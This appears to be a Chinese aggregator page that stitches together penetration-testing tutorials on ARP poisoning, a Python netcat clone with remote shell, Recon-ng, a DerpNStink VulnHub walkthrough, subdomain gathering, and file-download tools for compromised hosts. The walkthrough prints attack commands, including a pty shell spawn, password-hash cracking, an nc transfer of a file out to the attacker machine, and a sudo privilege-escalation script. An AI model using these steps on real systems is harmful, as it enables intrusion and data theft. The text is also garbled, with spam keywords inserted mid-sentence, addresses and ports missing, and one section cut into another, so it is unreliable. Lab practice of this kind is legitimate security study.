1.python渗透测试入门之arp中毒
2.Python渗透测试4-实现netcat工具
3.web渗透信息侦察收集工具——Recon-ng
4.全网最详细的渗透渗透测试靶机实操步骤——vulnhub靶机实战（六）DerpNStink: 1从网站打到内网提权！！源码！做渗
5.渗透测试的渗透时候，域名如何收集
6.渗透测试中常用的源码文件下载方式总结

python渗透测试入门之arp中毒

       《python黑帽子》一书中的实验9，即ARP投毒，做渗ptgui源码旨在展示网络欺骗技术。渗透实验通过在Kali虚拟机作为攻击者，源码CentOS虚拟机作为受害者，做渗MBP电脑作为观察者，渗透以及Kali作为网关的源码角色下展开。实验环境包括了MBP电脑、做渗Kali虚拟机、渗透CentOS虚拟机与conda开发环境。源码

       首先，做渗确认原始网络环境中的关键信息：网关、受害者、攻击者与观察者。

       在CentOS受害者端，与MBP观察者保持一致状态。

       Kali攻击者开启IP转发功能。

       在Kali攻击者上执行脚本，实施ARP欺骗。欺骗受害者认为网关MAC地址为:::e7::1c（实际为攻击者Kali的MAC地址）；同时欺骗网关，使其认为受害者的个人微信源码MAC地址同样为:::e7::1c。

       受害者端检查ARP表，发现网关的MAC地址已更改，证实实验成功。

       实验代码如下，展示了ARP投毒的核心步骤。

Python渗透测试4-实现netcat工具

       使用Python实现类似Netcat工具的代码是很有必要的，因为许多系统默认安装了Python解释器，但Netcat往往会被从系统中移除。本示例将演示如何使用Python实现一个简单的网络客户端和服务端，用于文件传输、远程命令执行。实现过程包含以下六个关键步骤：

       （1）导入Python模块，编写接收和执行命令的函数，使用subprocess库执行命令并获取结果。shlex.split用于处理命令行输入，以正确解析命令。

       （2）构建命令行界面的程序，通过argparse库解析参数，控制程序行为，包括上传文件、远程命令执行或启动命令行shell。

       （3）创建NetCat类，初始化对象并创建socket连接。根据参数调用监听或发送函数，微群人脉 源码实现数据接收和发送。

       （4）实现发送函数，基于目标和端口创建连接，发送数据并处理Ctrl+C组合键以关闭连接。通过循环接收并显示返回数据，等待用户输入。

       （5）监听函数将socket绑定到目标和端口，设置最大连接数，监听新连接，并调用处理函数进行数据处理。

       （6）处理函数根据接收到的参数执行命令、上传文件或创建shell。执行命令时调用execute函数，上传文件时接收并写入指定文件，创建shell时等待并执行用户输入的命令。

       测试示例包括：

       1. 输出帮助信息：`python netcat.py --help`

       2. 执行命令：启动接收方（服务端），指定本机IP和端口，命令行参数`-l -c`表示监听并创建shell。启动发送方（客户端），与服务端建立连接，并输入命令如`touch test1`和`ls`以查看文件。

       3. 指定执行命令：启动接收方，命令行参数`-l -e="cat /etc/hostname"`表示执行`cat /etc/hostname`命令。发送方请求执行结果并接收输出。网页游戏导航源码

       通过上述步骤和测试案例，实现了一个基本的Python网络通信工具，功能与Netcat类似，满足了文件传输和远程命令执行的需求。

web渗透信息侦察收集工具——Recon-ng

       在web渗透测试领域，信息侦察与收集是至关重要的环节。对于经验丰富的黑客而言，他们有自己独特的信息收集策略。在信息收集的过程中，合理利用现有的优秀工具，尤其是对新手而言，能极大提升效率与效果。本文将聚焦于一款新型的信息侦察收集工具——Recon-ng，分享其安装与使用方法。

       Recon-ng的安装步骤简单明了。首先，确保已安装dnspython、/entry/derpn...。难度中等（CTF）。这是一台基于Ubuntu的boot2root虚拟机，适用于模拟早期OSCP实验室的机器，且含一些小挑战。强调经典黑客方法，详细描述所有操作。2021萝卜前端源码

       目标：获取所有4个标志，以达到完整root访问权限。

       开始打靶，使用命令arp-scan -l扫描目标靶机的IP地址，发现与kali同一c段。使用nmap -sS -sV -T5 -A -p- ..0.进行端口扫描，发现开放、、端口。尝试通过端口访问，使用dirb爆破，发现大量目录。利用命令dirb ..0./ -w快速爆破内容。

       访问端口，查看源代码以获取flag1：flag1(EAEDF6AD7D0BB8AF4F9F1AACC3F0ECBAD6E)。根据爆破结果访问后台登录页面，意外发现无需爆破密码即可登录，使用命令：python -c 'import pty; pty.spawn("/bin/bash")'获取交互式shell。进一步发现正在运行mysql，使用命令：ps aux | grep mysql确认。

       在之前爆破的目录中找到mysql登录信息，登录后发现flag2和用户unclestinky的密码。使用Rockyou.txt字典破解密码，命令：echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC' >>/tmp/hash9.hash，执行命令解压字典文件：gzip -d /usr/share/wordlists/rockyou.txt.gz。破解后尝试登录unclestinky账户。

       在home目录下找到mrderp和stinky用户名。尝试SSH登录端口，发现需要使用指纹密钥。在network-logs目录下找到一个包含管理员修改密码的对话文件，翻译得知SSH密钥路径。保存密钥并登录，解决报错后在desktop目录找到flag3。

       在documents目录中发现derpissues.pcap文件，使用Wireshark分析。命令：kali上 nc -lvvp > derpissues.pcap，靶机上 nc -nv ..0. < derpissues.pcap。通过过滤找到密码derpderpderpderpderpderpderp，用于SSH登录mrderp账户。在Desktop目录中找到helpdesk.log文件，命令：cat Desktop/helpdesk.log，提示允许mrderp以root权限读写执行/home/mrderp/binaries/目录下derpy开头的文件。

       使用sudo -l命令显示权限，创建目录binaries并使用echo命令创建shell文件derpy.sh，赋予最高权限后用sudo命令执行，成功获取flag4。这台靶机较为复杂，耗时两天完成，涉及多种渗透测试知识与技巧。欢迎关注，一同进步。

渗透测试的时候，域名如何收集

       在进行渗透测试时，首要任务是信息收集，而外网信息收集至关重要。子域名收集是域名信息收集的重要部分，有助于突破外网边界进入内网。方法包括：

       1. 常规检查收集子域，如使用dig命令或python中dns库进行域传送，检查站点配置文件（如crossdomain.xml、sitemap文件）和内容安全策略（CSP）以收集子域。

       2. 利用证书透明度收集子域，通过访问多个链接搜索目标域名，获取有价值信息。

       3. 利用威胁情报平台数据收集子域，如社区.riskiq.com、pentest-tools.com等。

       4. 利用搜索引擎发现子域，使用Google搜索语法限制查询范围。

       5. 利用DNS数据集收集子域，从公开数据源如ip、百度云观测、hackertarget等获取。

       6. 域名备案搜集资产，通过查找域名备案信息发现同备案的其他域名资产。

       7. 域名爆破，通过枚举方式实现，解决泛解析问题。

       优秀开源工具如subfinder、SubdomainBrute、ESD、oneforall等，具有不同功能和优点。

       子域名收集常见问题包括死板的字典、DNS缓存问题等。动态字典解决方案包括权重更新、词语删除和字典更新，以提升收集效率。

       总结，子域名收集方法多样，应结合使用，合理选择工具。实际运用中，高效、全面的子域名列表需要综合考虑各种方法，结合工具进行收集。

渗透测试中常用的文件下载方式总结

       在渗透测试中，为了获取和传输文件，我们常常依赖于多种系统自带的工具。Windows平台有certutil、bitsadmin和powershell，Linux则有wget、curl和python等工具。

       certutil，作为Windows内置的实用工具，不仅支持文件下载，还具备MD5、SHA1、SHA校验及文件编码等功能。使用它下载文件时，可以保存在当前路径或指定路径，但需注意它会在缓存目录（%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content）保存副本，渗透测试时需清除这些副本。

       bitsadmin主要在Windows 7及以上版本中发挥作用，用于下载文件，同样支持指定保存路径和文件名。powershell则是一个强大的命令执行工具，适用于Windows 7及以上的系统，能进行文件下载。

       在Windows系统中，Visual Basic脚本语言vbs也可用于文件下载，只需编写并运行.vbs脚本，指定保存路径和文件名。

       而利用FTP（文件传输协议）进行文件下载时，需要在远程服务器搭建FTP服务，并在目标机器上使用特定命令进行下载。

       Linux系统中，wget是常用下载工具，能方便地下载文件并指定保存路径和文件名。curl同样以URL语法执行文件传输，同样支持指定文件保存信息。

       最后，Linux的python语言也能用于文件下载，为渗透测试提供了另一种灵活的解决方案。